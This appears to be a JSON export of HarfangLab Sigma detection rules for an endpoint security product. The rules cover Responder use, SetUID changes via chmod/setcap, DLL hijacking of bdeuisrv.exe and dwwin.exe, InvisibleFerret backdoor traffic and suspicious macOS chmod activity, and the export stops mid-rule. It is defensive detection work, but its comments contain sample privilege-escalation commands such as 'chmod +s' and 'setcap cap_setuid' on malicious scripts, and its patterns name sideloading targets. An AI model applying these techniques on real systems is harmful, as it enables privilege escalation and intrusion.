"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619415Z",
"creation_date": "2026-03-23T11:45:34.619416Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619421Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/SpiderLabs/Responder",
"https://github.com/lgandx/Responder",
"https://attack.mitre.org/software/S0174/"
],
"name": "t1557_001_responder_usage.yml",
"content": "title: Responder Executed\nid: 058378a0-6b19-4ce5-86a4-9bd8a453e8ad\ndescription: |\n Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\n Attackers can use this tool for credential access, privilege escalation and lateral movement.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://github.com/SpiderLabs/Responder\n - https://github.com/lgandx/Responder\n - https://attack.mitre.org/software/S0174/\ndate: 2024/09/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.HackTool.Responder\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine: 'sh -c */certs/gen-self-signed-cert.sh >/dev/null 2>&1'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "058378a0-6b19-4ce5-86a4-9bd8a453e8ad",
"rule_name": "Responder Executed",
"rule_description": "Detects Responder, an open source tool used for poisoning LLMNR, NBT-NS, and mDNS queries, selectively responding based on query types, primarily targeting SMB services.\nAttackers can use this tool for credential access, privilege escalation and lateral movement.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-05",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.594725Z",
"creation_date": "2026-03-23T11:45:34.623356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623360Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md",
"https://attack.mitre.org/techniques/T1548/001/"
],
"name": "t1548_001_chmod_setuid_linux.yml",
"content": "title: SetUID Access Flag Set via chmod/setcap\nid: 058b2e5d-6e8a-4289-bfb7-96a9cc306c0f\ndescription: |\n Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\n This could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\n It is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md\n - https://attack.mitre.org/techniques/T1548/001/\ndate: 2022/09/26\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.001\n - attack.t1222.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Chmod\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_chmod:\n # chmod +s /home/user/malicious_script.sh\n # chmod ug+s /home/user/malicious_script.sh\n # chmod u+s /home/user/malicious_script.sh\n # chmod 2644 /home/user/malicious_script.sh\n # chmod 6644 /home/user/malicious_script.sh\n Image|endswith: '/chmod'\n CommandLine|contains:\n - ' +s'\n - 'ug+s'\n - 'u+s'\n - ' 4??? '\n - ' 6??? '\n ParentImage|contains: '?'\n\n selection_setcap:\n # setcap cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid=e /home/user/malicious_script.sh\n # setcap cap_setuid=+pie /home/user/malicious_script.sh\n # setcap cap_net_bind_service,cap_setuid=pe /home/user/malicious_script.sh\n # setcap cap_setuid,cap_setgid=+pie /home/user/malicious_script.sh\n Image|endswith: '/setcap'\n CommandLine|contains: 'cap_setuid'\n ParentImage|contains: '?'\n\n exclusion_octal:\n CommandLine|startswith: 'chmod ??? 
/'\n\n exclusion_dpkg:\n - ParentImage: '/usr/bin/dpkg'\n - GrandparentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_suexec:\n CommandLine: 'chmod 4510 /usr/sbin/suexec'\n ParentCommandLine: '/bin/bash /usr/lib64/plesk-?.?/install_suexec'\n\n exclusion_virtualbox:\n CommandLine:\n - 'chmod 4511 /usr/lib/virtualbox/VBoxVolInfo'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetAdpCtl'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetNAT'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxNetDHCP'\n - 'chmod 4511 /usr/lib/virtualbox/VBoxHeadless'\n - 'chmod 4511 /usr/lib/virtualbox/VirtualBoxVM'\n ParentCommandLine: '/bin/sh /var/lib/dpkg/info/virtualbox-*.postinst configure*'\n\n exclusion_yocto_sdk:\n # chmod o-x,u+s /opt/yocto/yocto-new/build/...\n # chmod 4755 /opt/yocto/kirkstone/build..\n # chmod 4111 /opt/yocto/yocto-new/build/tmp...\n CommandLine: 'chmod * /opt/yocto/*'\n\n exclusion_vtom:\n CommandLine:\n - 'chmod 4755 /opt/vtom/manager/bin/vtmanager'\n - 'chmod 4755 /opt/vtom/abm/bin/bdaemon'\n\n exclusion_isa:\n ParentCommandLine: '/bin/bash /etc/init.d/isa status'\n\n exclusion_bitdefender:\n # /bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure 7.0.5-200090\n CommandLine: 'chmod +s /opt/bitdefender-security-tools/bin/auctl'\n ParentCommandLine|startswith: '/bin/sh /var/lib/dpkg/info/bitdefender-security-tools.postinst configure'\n\n exclusion_nxserver:\n CommandLine|contains:\n - ' /etc/nx/nxserver'\n - ' /usr/nx/scripts'\n ParentCommandLine|startswith:\n - '/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxserver'\n - '/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxnode'\n - '/bin/bash /usr/nx/scripts/setup/nxrunner'\n - '/usr/bin/bash /usr/nx/scripts/setup/nxrunner'\n\n exclusion_apt:\n GrandparentImage:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_dnf:\n - GrandparentImage: '/usr/bin/dnf5'\n - 
ProcessGrandparentCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_rpm:\n ProcessAncestors|contains: '|/usr/bin/rpm|'\n\n exclusion_netdata:\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/netdata-updater'\n - CommandLine|startswith: 'chmod 4750 usr/libexec/netdata/plugins.d/'\n ParentCommandLine|startswith: './bin/bash system/install-or-update.sh '\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/bin/python /bin/yum '\n\n exclusion_make:\n - ParentImage: '/usr/bin/make'\n - GrandparentImage: '/usr/bin/make'\n\n exclusion_sap:\n CommandLine: 'chmod * /usr/sap/*/exe/*'\n ParentCommandLine|startswith:\n - '/bin/sh ./oraroot.sh '\n - '/bin/sh ./saproot.sh '\n\n exclusion_oracle:\n CommandLine|contains:\n - 'chmod * /u01/app/oracle/'\n - 'chmod ???? /oracle/'\n - 'chmod ???? /exec/oracle/product/'\n - 'chmod ???? /usr/lib/oracle/agent/'\n - 'chmod ???? /opt/ORCLfmap/'\n - 'chmod ???? /opt/oracle/'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cloudera:\n ParentCommandLine|startswith:\n - '/usr/bin/python?.? /opt/cloudera'\n - '/usr/bin/python?.?? /opt/cloudera'\n\n exclusion_oneautomation:\n ProcessCommandLine: 'chmod 4755 /opt/oneautomation/*/agent/bin/ucxj*'\n\n exclusion_docker:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n - '|/usr/sbin/runc|/usr/bin/dockerd|'\n - '|/usr/bin/podman|'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/opt/copiloteagent/copiloteagent|'\n - '|/usr/NX/bin/nxpost|'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "058b2e5d-6e8a-4289-bfb7-96a9cc306c0f",
"rule_name": "SetUID Access Flag Set via chmod/setcap",
"rule_description": "Detects when chmod or setcap are used to set the SetUID bit or capability on a file.\nThis could be used by an attacker to execute a file with a different (and potentially more privileged) user context.\nIt is recommended to analyze the targeted binary as well as the process responsible for the setting change and look for privilege escalation and malicious binaries.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1222.002",
"attack.t1548.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592167Z",
"creation_date": "2026-03-23T11:45:34.592171Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592179Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdeuisrv.yml",
"content": "title: DLL Hijacking via bdeuisrv.exe\nid: 059bfeb6-d7ab-49e8-995d-d3c4bca73b53\ndescription: |\n Detects potential Windows DLL Hijacking via bdeuisrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdeuisrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "059bfeb6-d7ab-49e8-995d-d3c4bca73b53",
"rule_name": "DLL Hijacking via bdeuisrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdeuisrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587052Z",
"creation_date": "2026-03-23T11:45:34.587056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587064Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dwwin.yml",
"content": "title: DLL Hijacking via dwwin.exe\nid: 059d6ada-8f39-4f7f-a79a-a0e3ef21e910\ndescription: |\n Detects potential Windows DLL Hijacking via dwwin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwwin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "059d6ada-8f39-4f7f-a79a-a0e3ef21e910",
"rule_name": "DLL Hijacking via dwwin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dwwin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619386Z",
"creation_date": "2026-03-23T11:45:34.619388Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619392Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/",
"https://objective-see.org/blog/blog_0x7A.html",
"https://www.group-ib.com/blog/apt-lazarus-python-scripts/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_invisibleferret_backdoor_linux.yml",
"content": "title: InvisibleFerret Backdoor Communication Detected (Linux)\nid: 05b15125-dd13-43a6-aa65-67a40e6b9fc1\ndescription: |\n Detects network communications related to the InvisibleFerret backdoor.\n InvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\n InvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\n It is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\nreferences:\n - https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\n - https://objective-see.org/blog/blog_0x7A.html\n - https://www.group-ib.com/blog/apt-lazarus-python-scripts/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/10/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.credential_access\n - attack.t1056.001\n - attack.t1555.003\n - attack.command_and_control\n - attack.t1571\n - attack.exfiltration\n - attack.t1041\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.ThreatActor.Lazarus\n - classification.Linux.ThreatActor.DPRK\n - classification.Linux.Malware.InvisibleFerret\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection:\n ProcessCommandLine: 'python* /home/*/.npl'\n ProcessGrandparentImage: '/node'\n DestinationPort:\n - '1224'\n - '2245'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "05b15125-dd13-43a6-aa65-67a40e6b9fc1",
"rule_name": "InvisibleFerret Backdoor Communication Detected (Linux)",
"rule_description": "Detects network communications related to the InvisibleFerret backdoor.\nInvisibleFerret is a cross-platform backdoor written in Python. The development and usage of this tool has been attributed to Lazarus Group (also known as APT38 or DPRK), a North Korean state-sponsored cyber threat group.\nInvisibleFerret consists of various components that target popular web browsers on Windows, Linux and macOS to steal login credentials and other sensitive data.\nIt is recommended to investigate the process performing this action and the destination IP address to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-10-25",
"rule_modified_date": "2025-02-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.credential_access",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1056.001",
"attack.t1555.003",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "05e6ac9c-7eac-44f4-a137-10196a85ae1b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608259Z",
"creation_date": "2026-03-23T11:45:34.608263Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608270Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_binary_chmodx_susp_directory.yml",
"content": "title: Suspicious Binary Made Executable\nid: 05e6ac9c-7eac-44f4-a137-10196a85ae1b\ndescription: |\n Detects an attribute change on a file to make it executable in an uncommon directory.\n Adversaries may set the execute bit on a file before executing it.\n It is recommended to check that the new executable file is harmless and to look for other suspicious behavior from the process modifying the file.\nreferences:\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/07/30\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1222.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'chmod'\n PrettyMode|contains: 'x'\n Image|endswith: '/chmod'\n\n selection_path:\n Path|startswith:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n selection_ancestors:\n ProcessAncestors|contains:\n - '/users/shared/'\n - '/private/tmp/'\n - '/private/var/tmp/'\n - '/private/etc/'\n - '/private/var/root/'\n - '/Volumes/'\n\n exclusion_unix:\n Path: '/private/tmp/.*-unix'\n\n exclusion_adobe:\n Path: '/private/tmp/com.adobe.acrobat.DC/acrobat.plist'\n ProcessCommandLine: '/bin/chmod -R 777 /tmp/com.adobe.acrobat.DC'\n\n exclusion_adobe_updater:\n - Path: '/private/tmp/com.adobe.acrobat.updater'\n ProcessCommandLine: 'chmod o+w /tmp/com.adobe.acrobat.updater'\n - Path: '/private/tmp/com.adobe.AcrobatRefreshManager'\n ProcessCommandLine: 'chmod go= /tmp/com.adobe.AcrobatRefreshManager'\n\n exclusion_ansible:\n Path: '/private/tmp/ansible-tmp-*'\n ProcessCommandLine|startswith: 'chmod u+x /tmp/ansible-tmp-'\n\n exclusion_installer:\n ProcessParentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n ProcessGrandparentCommandLine|startswith:\n - '/bin/sh /tmp/PKInstallSandbox.??????/'\n - '/bin/bash /tmp/pkinstallsandbox.??????/'\n\n exclusion_dotnet:\n ProcessParentCommandLine|contains|all:\n - 'dotnet'\n - 'install'\n\n exclusion_jamf:\n - Path: '/Users/Shared/jamfdata'\n ProcessCommandLine: 'chmod -R o-w /System/Volumes/Data/Users/Shared'\n - ProcessParentCommandLine|startswith: '/bin/bash /library/application support/jamf/'\n\n exclusion_maxon:\n Path|startswith:\n - '/Users/Shared/Maxon'\n - '/Users/Shared/Red Giant'\n ProcessCommandLine|startswith:\n - 'chmod -R a+w /Users/Shared/Maxon'\n - 'chmod -R a+w /Users/Shared/Red Giant'\n\n exclusion_tunnelblick:\n Path: '/private/var/root/Library/Application Support/Tunnelblick'\n\n exclusion_common_folders:\n - ProcessParentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - '/Users/*/Applications/'\n - '/Users/*/Library/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/'\n - '/Library/'\n - 